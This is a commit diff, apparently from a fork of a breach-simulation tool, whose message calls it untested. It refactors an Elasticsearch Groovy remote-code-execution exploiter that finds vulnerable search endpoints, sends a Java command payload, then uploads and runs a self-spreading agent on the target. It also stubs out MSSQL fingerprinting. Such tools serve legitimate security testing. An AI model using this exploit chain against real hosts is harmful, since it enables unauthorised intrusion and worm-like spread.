forked from p15670423/monkey
Uploaded and modified standard web_rce code usage.Not working, not tested
This commit is contained in:
Vakaris
parent
3f809403d1
commit
8ddfb03f27
|
|
@ -9,17 +9,17 @@ import logging
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from exploit import HostExploiter
|
|
||||||
from model import DROPPER_ARG
|
from model import DROPPER_ARG
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||||
|
from exploit.web_rce import WebRCE
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class ElasticGroovyExploiter(HostExploiter):
|
class ElasticGroovyExploiter(WebRCE):
|
||||||
# attack URLs
|
# attack URLs
|
||||||
BASE_URL = 'http://%s:%s/_search?pretty'
|
BASE_URL = 'http://%s:%s/_search?pretty'
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
MONKEY_RESULT_FIELD = "monkey_result"
|
||||||
|
|
@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
super(ElasticGroovyExploiter, self).__init__(host)
|
||||||
self._config = __import__('config').WormConfiguration
|
|
||||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
|
||||||
|
|
||||||
def is_os_supported(self):
|
|
||||||
"""
|
|
||||||
Checks if the host is vulnerable.
|
|
||||||
Either using version string or by trying to attack
|
|
||||||
:return:
|
|
||||||
"""
|
|
||||||
if not super(ElasticGroovyExploiter, self).is_os_supported():
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
# self.exploit_host_linux()
|
||||||
if ES_SERVICE not in self.host.services:
|
if ES_SERVICE not in self.host.services:
|
||||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
||||||
return False
|
return False
|
||||||
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
|
# We need a reference to the exploiter for WebRCE framework to use
|
||||||
major = int(major)
|
exploiter = self.exploit
|
||||||
minor = int(minor)
|
# Build url from host and elastic port(not https)
|
||||||
build = int(build)
|
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
|
||||||
if major > 1:
|
vulnerable_urls = []
|
||||||
|
for url in urls:
|
||||||
|
if WebRCE.check_if_exploitable(exploiter, url):
|
||||||
|
vulnerable_urls.append(url)
|
||||||
|
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||||
|
if not vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
if major == 1 and minor > 4:
|
|
||||||
return False
|
|
||||||
if major == 1 and minor == 4 and build > 2:
|
|
||||||
return False
|
|
||||||
return self.is_vulnerable()
|
|
||||||
|
|
||||||
def exploit_host(self):
|
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
||||||
real_host_os = self.get_host_os()
|
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||||
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
|
return True
|
||||||
if 'linux' in self.host.os['type']:
|
|
||||||
return self.exploit_host_linux()
|
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||||
else:
|
return False
|
||||||
return self.exploit_host_windows()
|
|
||||||
|
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
||||||
|
|
||||||
|
# We can't use 'if not' because response may be ''
|
||||||
|
if data is not False and data['response'] == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def exploit(self, url, command):
|
||||||
|
payload = self.JAVA_CMD % command
|
||||||
|
response = requests.get(url, data=payload)
|
||||||
|
result = self.get_results(response)
|
||||||
|
if not result: # not vulnerable
|
||||||
|
return False
|
||||||
|
return result[0]
|
||||||
|
|
||||||
def exploit_host_windows(self):
|
def exploit_host_windows(self):
|
||||||
"""
|
"""
|
||||||
|
|
|
||||||
|
|
@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
|
||||||
Discovered server information written to the Host info struct.
|
Discovered server information written to the Host info struct.
|
||||||
True if success, False otherwise.
|
True if success, False otherwise.
|
||||||
"""
|
"""
|
||||||
|
# TODO remove auto-return
|
||||||
|
return False
|
||||||
assert isinstance(host, VictimHost)
|
assert isinstance(host, VictimHost)
|
||||||
|
|
||||||
# Create a UDP socket and sets a timeout
|
# Create a UDP socket and sets a timeout
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue